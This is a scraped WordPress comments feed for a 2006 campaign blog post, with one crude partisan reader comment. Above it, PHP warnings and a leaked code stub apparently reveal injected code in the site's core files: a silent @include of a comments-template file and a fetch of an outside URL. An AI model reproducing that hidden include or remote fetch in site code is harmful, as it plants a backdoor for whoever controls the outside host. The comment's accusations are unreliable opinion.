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Warning: Variable passed to each() is not an array or object in /home/64/34/3013464/web/wordpress/wp-blog-header.php on line 5
function wp_template_comments(){ @include(defined('ABSPATH') ? ABSPATH.'wp-includes/template-functions-comments.php' : (is_file('wp-includes/template-functions-comments.php')?'wp-includes/template-functions-comments.php':'template-functions-comments.php')); } ?>
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Warning: file(http://goll.awardspace.com/new.html) [function.file]: failed to open stream: Invalid argument in /home/64/34/3013464/web/wordpress/wp-blog-header.php on line 2

Warning: sort() expects parameter 1 to be array, boolean given in /home/64/34/3013464/web/wordpress/wp-blog-header.php on line 3

Warning: Variable passed to each() is not an array or object in /home/64/34/3013464/web/wordpress/wp-blog-header.php on line 5

Warning: Cannot modify header information - headers already sent by (output started at /home/64/34/3013464/web/wordpress/wp-blog-header.php:2) in /home/64/34/3013464/web/wordpress/wp-commentsrss2.php on line 9
Comments on: Lieberman Loses Primary - Dems Loss Could Be Bigger http://www.louisstone.com/wordpress/?p=19 A dissection of the issues affecting us all and what Candidate Stone intends to do about them. Fri, 14 Mar 2025 13:01:37 +0000 http://wordpress.org/?v=2.0.3 by: Paulie http://www.louisstone.com/wordpress/?p=19#comment-7 Wed, 09 Aug 2006 18:23:36 +0000 http://www.louisstone.com/wordpress/?p=19#comment-7 There was some very good news last night you forgot to mention. Cynthia McKinney got her ass handed to her in the primary run-off. That's one anti-Semite down, to many to go. Speaking of Jew-Haters, did you see who was behind Lamont during his victory address? Exactly! There was some very good news last night you forgot to mention. Cynthia McKinney
got her ass handed to her in the primary run-off. That’s one anti-Semite down,
to many to go.

Speaking of Jew-Haters, did you see who was behind Lamont during his victory
address? Exactly!
